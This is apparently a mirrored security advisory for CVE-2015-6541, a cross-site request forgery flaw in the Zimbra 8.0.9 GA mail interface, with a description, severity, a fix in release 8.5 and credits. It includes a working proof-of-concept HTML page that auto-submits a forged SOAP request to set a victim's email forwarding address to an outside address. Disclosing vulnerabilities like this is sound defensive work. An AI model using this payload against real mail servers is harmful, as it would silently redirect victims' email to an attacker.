Lucene search
K

Zimbra 8.0.9 GA Cross Site Request Forgery

🗓️ 26 Feb 2016 00:00:00Reported by Damien CauquilType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 52 Views

Multiple CSRF vulnerabilities in Zimbra 8.0.9 GA Release enable account preference changes like email forwarding without authentication

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Zimbra 8.0.9 GA - Cross-Site Request Forgery
26 Feb 201600:00
zdt
CNVD
Zimbra Collaboration Server Mail Interface Cross-Site Request Forgery Vulnerability
12 Apr 201600:00
cnvd
CVE
CVE-2015-6541
8 Apr 201614:00
cve
Cvelist
CVE-2015-6541
8 Apr 201614:00
cvelist
Exploit DB
Zimbra 8.0.9 GA - Cross-Site Request Forgery
26 Feb 201600:00
exploitdb
EUVD
EUVD-2015-6480
7 Oct 202500:30
euvd
exploitpack
Zimbra 8.0.9 GA - Cross-Site Request Forgery
26 Feb 201600:00
exploitpack
NVD
CVE-2015-6541
8 Apr 201614:59
nvd
Prion
Cross site request forgery (csrf)
8 Apr 201614:59
prion
`======================================  
Multiple CSRF in Zimbra Mail interface  
======================================  
  
  
CVE-2015-6541  
  
Description  
===========  
  
Multiple CSRF vulnerabilities have been found in the Mail interface of  
Zimbra 8.0.9 GA Release, enabling to change account  
preferences like e-mail forwarding.  
  
  
CSRF  
====  
  
Forms in the preferences part of old releases of Zimbra are vulnerable  
to CSRF because of the lack of a CSRF token identifying a valid session.  
As a consequence, requests can be forged and played arbitrarily.  
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
----------------  
Proof of Concept  
----------------  
  
<html>  
<body>  
<form enctype="text/plain" id="trololo"  
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">  
<input name='<soap:Envelope  
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context  
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38  
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account  
xmlns="" by="name">[email protected]</account><format xmlns=""  
type="js"/></context></soap:Header><soap:Body><BatchRequest  
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest  
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""  
name="zimbraPrefMailForwardingAddress">[email protected]</pref></ModifyPrefsRequest><a  
xmlns="" n'  
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
Solution  
========  
  
Sensitive forms should be protected by a CSRF token.  
  
  
Fixes  
=====  
  
Fixed with 8.5 release : bug 83547  
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)  
  
  
Affected versions  
=================  
  
* Zimbra <= 8.0.9 GA Release  
  
  
Credits  
=======  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail  
-dot- fr)  
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)  
  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation